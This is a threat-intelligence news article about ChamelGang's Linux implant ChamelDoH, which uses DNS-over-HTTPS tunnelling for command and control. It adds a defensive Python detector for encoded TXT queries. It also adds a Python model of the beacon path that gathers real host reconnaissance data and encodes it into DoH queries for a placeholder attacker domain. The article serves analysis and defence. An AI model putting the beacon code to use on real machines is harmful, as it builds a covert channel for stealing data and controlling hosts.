Chinese Hackers Employed DNS-over-HTTPS for Linux Malware Communication


ChamelGang, a sophisticated threat actor believed to be based in China, has been using a range of tools in its intrusions, according to a recent investigation by the security researchers at Stairwell Threat Research.

During that investigation, Stairwell's team also uncovered previously undocumented tools that the group has developed for Linux intrusions.

The clearest example is ChamelDoH, an implant written in C++ that communicates with its operators through DNS-over-HTTPS (DoH) tunnelling.

Chinese Hackers' Targets

ChamelGang has previously targeted energy, aviation, and government organizations in the following countries:-

  • Russia
  • The United States
  • Japan
  • Turkey
  • Taiwan
  • Vietnam
  • India
  • Afghanistan
  • Lithuania
  • Nepal

DNS-over-HTTPS for Linux Malware

The link between ChamelGang and the newly discovered Linux malware was established by identifying a domain and a tool previously seen in ChamelGang campaigns documented by Positive Technologies.


The sample (SHA-256 34c19cedffe0ee86515331f93b130ede89f1773c3d3a2d0e9c7f7db8f6d9a0a7) is a large C++ binary whose primary purpose is remote access to the compromised system.

The sample utilizes DoH tunneling to establish a communication channel with the configured command-and-control (C2) infrastructure.

To encode its traffic, the sample uses a modified base64 alphabet and places the result in subdomains of a domain whose nameserver is controlled by the attacker.

When executed, the implant immediately makes several system calls to collect reconnaissance data, which it compiles into a JSON object.

ChamelDoH gathers the following details on execution:-

  • host_name: System hostname
  • ip: Any IP address for an interface that is not 127.0.0.1
  • system_type: sysname parsed from the system’s utsname struct, i.e. Linux
  • system_version: version parsed from the system’s utsname struct, i.e. #43-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 18 18:21:28 UTC 2023
  • whoami: The user context that ChamelDoH is running under
  • process_pid: The process ID of the ChamelDoH process
  • bits: The bitness of the system, i.e. x86_64
  • pwd: The working directory of the ChamelDoH process
  • id: A pseudo-randomly generated integer generated by ChamelDoH that is used as an implant ID

What sets ChamelDoH apart is its approach to command-and-control (C2).

Two keys in a JSON object define the implant’s C2 configuration.

Here the sample contains the following configuration:-

[Figure: ChamelDoH C2 configuration (screenshot in the Stairwell report, not reproduced in this text)]

Using that configuration, the implant sends DoH requests to public DoH providers for names under the attacker-controlled domain.

Each C2 message is encoded as subdomains of that domain, and the implant issues TXT queries for the resulting names; the public resolver forwards those queries to the attacker’s nameserver, which receives the encoded data.

Blocking those DoH providers enterprise-wide is hard because they also serve large volumes of legitimate DNS traffic.

Because the queries travel over HTTPS, they cannot be inspected without intercepting TLS, so defenders cannot see which names are being resolved via DoH.

This makes it difficult to detect or block anomalous traffic such as the encoded C2 queries used by ChamelDoH.
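The practical consequence of the paragraphs above is that detection only works at a point where the DNS question is visible in clear: an enterprise-run DoH resolver, a TLS-inspecting proxy, or the resolver's own logs. The following added example (my code, not Stairwell's tooling or anything from the report) shows the kind of heuristic a defender can run at such a vantage point: it flags zones that receive many distinct TXT queries whose subdomain labels are long and high-entropy, which is what base64-encoded beacons look like. The log format, the sample lines and the thresholds are constructed for the example.

```python
"""Resolver-side heuristic for DoH/DNS tunnel beacons (added example).

Assumes decrypted queries are visible (own DoH resolver, TLS-inspecting proxy,
or resolver logs). The log format and all sample lines are constructed.
"""
import math
from collections import defaultdict

# Constructed sample: "<timestamp> <client> <qtype> <qname>". Not real traffic.
SAMPLE_LOG = """\
2023-06-15T12:00:01Z 10.0.0.5 A www.example.com
2023-06-15T12:00:02Z 10.0.0.5 TXT _dmarc.example.com
2023-06-15T12:00:03Z 10.0.0.5 A cdn-edge-7.assets.example-cdn.net
2023-06-15T12:00:04Z 10.0.0.9 TXT 1a2b-1.eyJob3N0X25hbWUiOiJ3ZWItMDEiLCJpcCI6IjEwLjAuMC45In0.t.example-c2.test
2023-06-15T12:00:09Z 10.0.0.9 TXT 1a2b-2.Q2hhbWVsRG9IIHRveSBiZWFjb24gZGF0YSBibG9iIDI.t.example-c2.test
2023-06-15T12:00:14Z 10.0.0.9 TXT 1a2b-3.dGhpcyBpcyBhbm90aGVyIGZha2UgYmVhY29uIHBheWxvYWQ.t.example-c2.test
2023-06-15T12:00:19Z 10.0.0.9 TXT 1a2b-4.c29tZSBtb3JlIHJhbmRvbS1sb29raW5nIHRleHQgaGVyZQ.t.example-c2.test
"""

# Thresholds chosen for this example; tune them against your own baseline.
MIN_LABEL_LEN = 24      # one label this long is rare outside CDNs and tunnels
MIN_ENTROPY = 3.5       # bits per character over the encoded subdomain
MIN_QUERIES = 3         # distinct suspicious names per zone before alerting


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded blobs score far above hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_zone(qname: str) -> tuple:
    """Crude zone split: last two labels. A real detector uses the public suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def is_tunnel_like(qtype: str, sub_labels: list) -> bool:
    """TXT lookups carrying one long, high-entropy label look like encoded data."""
    if qtype != "TXT" or not sub_labels:
        return False
    longest = max(len(label) for label in sub_labels)
    return longest >= MIN_LABEL_LEN and shannon_entropy("".join(sub_labels)) >= MIN_ENTROPY


def scan(log_text: str) -> dict:
    """Per zone: query count, distinct tunnel-like subdomains, and the clients sending them."""
    stats = defaultdict(lambda: {"total": 0, "suspicious": set(), "clients": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split()
        zone, sub = split_zone(qname)
        stats[zone]["total"] += 1
        if is_tunnel_like(qtype, sub):
            stats[zone]["suspicious"].add(".".join(sub))
            stats[zone]["clients"].add(client)
    return stats


def flag_zones(log_text: str) -> list:
    """Zones with enough distinct encoded TXT names to look like a tunnel."""
    return sorted(z for z, st in scan(log_text).items() if len(st["suspicious"]) >= MIN_QUERIES)


if __name__ == "__main__":
    for zone in flag_zones(SAMPLE_LOG):
        st = scan(SAMPLE_LOG)[zone]
        print(f"{zone}: {len(st['suspicious'])} encoded TXT names from {sorted(st['clients'])}")
```

The heuristic is deliberately simple and will need tuning: legitimate TXT traffic (SPF, DKIM, ACME challenges) uses short, low-entropy labels and a handful of names per zone, whereas a beacon produces a new high-entropy name on every check-in. If the queries are not visible at all because hosts talk straight to a public DoH endpoint, the remaining controls sit at the network-policy level (forcing the enterprise resolver and restricting known DoH endpoints), with the trade-off the article describes.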


The effect resembles C2 over domain fronting, where traffic is first sent to a legitimate service hosted on a content delivery network (CDN) and then routed on to the C2 server based on the request’s Host header.

In both cases, detecting and preventing the technique becomes substantially harder.

For confidentiality, ChamelDoH encrypts its communication with AES-128; the ciphertext is then base64-encoded so that it can be inserted as a subdomain.
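To make the beacon path concrete, here is an added example (my code, not the implant's and not from the Stairwell report) that models the steps described above: collecting the reconnaissance fields listed earlier, converting an encrypted blob with a DNS-safe base64 variant, splitting it into subdomain labels under an attacker-owned zone, and forming the DoH TXT lookup that a public resolver would forward to that zone's nameserver, plus the nameserver-side decode. The AES-128 layer is left out; any opaque bytes are accepted as the "ciphertext". The zone name, resolver host, label layout and substitute alphabet are assumptions for illustration.

```python
"""Toy model of the ChamelDoH beacon path (added example, not the implant's code).

Steps: JSON recon -> (AES-128, omitted here) -> DNS-safe base64 -> subdomain
labels under an attacker zone -> DoH TXT query to a public resolver. The zone,
resolver, label layout and alphabet are assumptions for this example.
"""
import base64
import getpass
import os
import platform
import secrets
import socket
from urllib.parse import parse_qs, quote, urlsplit

MAX_LABEL = 63     # RFC 1035: one label is at most 63 octets
MAX_NAME = 253     # practical limit for a full presentation-format name

# Standard base64 uses '+', '/' and '=' padding; none survive in a DNS label.
# This variant swaps '+/' for '-_' and drops padding (one possible "modified
# alphabet"; the implant's own table is not reproduced on the page).
_TO_DNS = bytes.maketrans(b"+/", b"-_")
_FROM_DNS = bytes.maketrans(b"-_", b"+/")


def _first_non_loopback_ip() -> str:
    """Pick a local interface address without sending anything (UDP connect)."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("192.0.2.1", 53))   # TEST-NET-1; nothing is transmitted
            return s.getsockname()[0]
    except OSError:
        return ""


def collect_recon() -> dict:
    """The fields the article lists; uname() is where sysname/version come from."""
    u = platform.uname()
    return {
        "host_name": u.node,
        "ip": _first_non_loopback_ip(),
        "system_type": u.system,
        "system_version": u.version,
        "whoami": getpass.getuser(),
        "process_pid": os.getpid(),
        "bits": u.machine,
        "pwd": os.getcwd(),
        "id": secrets.randbelow(1 << 31),   # random implant ID, as in the article
    }


def dns_b64_encode(data: bytes) -> str:
    return base64.b64encode(data).translate(_TO_DNS).rstrip(b"=").decode()


def dns_b64_decode(text: str) -> bytes:
    raw = text.encode().translate(_FROM_DNS)
    return base64.b64decode(raw + b"=" * (-len(raw) % 4))


def to_qname(ciphertext: bytes, zone: str, implant_id: int, seq: int) -> str:
    """Prefix an implant/sequence tag, then cut the encoded blob into labels."""
    text = dns_b64_encode(ciphertext)
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    qname = ".".join([f"{implant_id:x}-{seq:x}", *labels, zone])
    if len(qname) > MAX_NAME:
        raise ValueError("beacon exceeds one name; split it across queries")
    return qname


def doh_txt_url(resolver: str, qname: str) -> str:
    """GET form of a DoH TXT lookup; the whole URL travels inside TLS."""
    return f"https://{resolver}/dns-query?name={quote(qname)}&type=TXT"


def build_beacon(ciphertext: bytes, zone: str, implant_id: int, seq: int, resolver: str) -> str:
    return doh_txt_url(resolver, to_qname(ciphertext, zone, implant_id, seq))


def decode_beacon(url: str, zone: str) -> tuple:
    """Attacker nameserver side: recover (implant_id, seq, ciphertext) from the query."""
    qname = parse_qs(urlsplit(url).query)["name"][0]
    if not qname.endswith("." + zone):
        raise ValueError("query is not under the C2 zone")
    head, *labels = qname[: -len(zone) - 1].split(".")
    implant_id, seq = (int(x, 16) for x in head.split("-"))
    return implant_id, seq, dns_b64_decode("".join(labels))


if __name__ == "__main__":
    fake_ct = secrets.token_bytes(40)   # stands in for the AES-128 output
    url = build_beacon(fake_ct, "c2.example.test", 0x1A2B, 1, "dns.resolver.example")
    print(url)
    print(decode_beacon(url, "c2.example.test")[2] == fake_ct)
```

Two caveats worth knowing when reading traffic like this. First, base64 is case-sensitive while DNS names are not; most resolvers preserve the case of the question, but any that normalize it corrupt the tunnel, which is why some tunnels prefer base32. Second, a 253-character name carries well under 200 bytes of payload, so an implant uploading a file must spread it over many queries, and that burst of distinct TXT names for one zone is exactly what a resolver-side detector should look for.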

Capabilities

The implant supports the following task types, listed here with their commands:-

  • run: Execute a file/shell command
  • sleep: Set number of seconds until next check-in
  • wget: Download a file from a URL
  • upload: Read and upload a file
  • download: Download and write a file
  • rm: Delete a file
  • cp: Copy a file to a new location
  • cd: Change the working directory

The Stairwell Threat Research team continues to analyse ChamelDoH and the other previously undocumented tools used by ChamelGang.



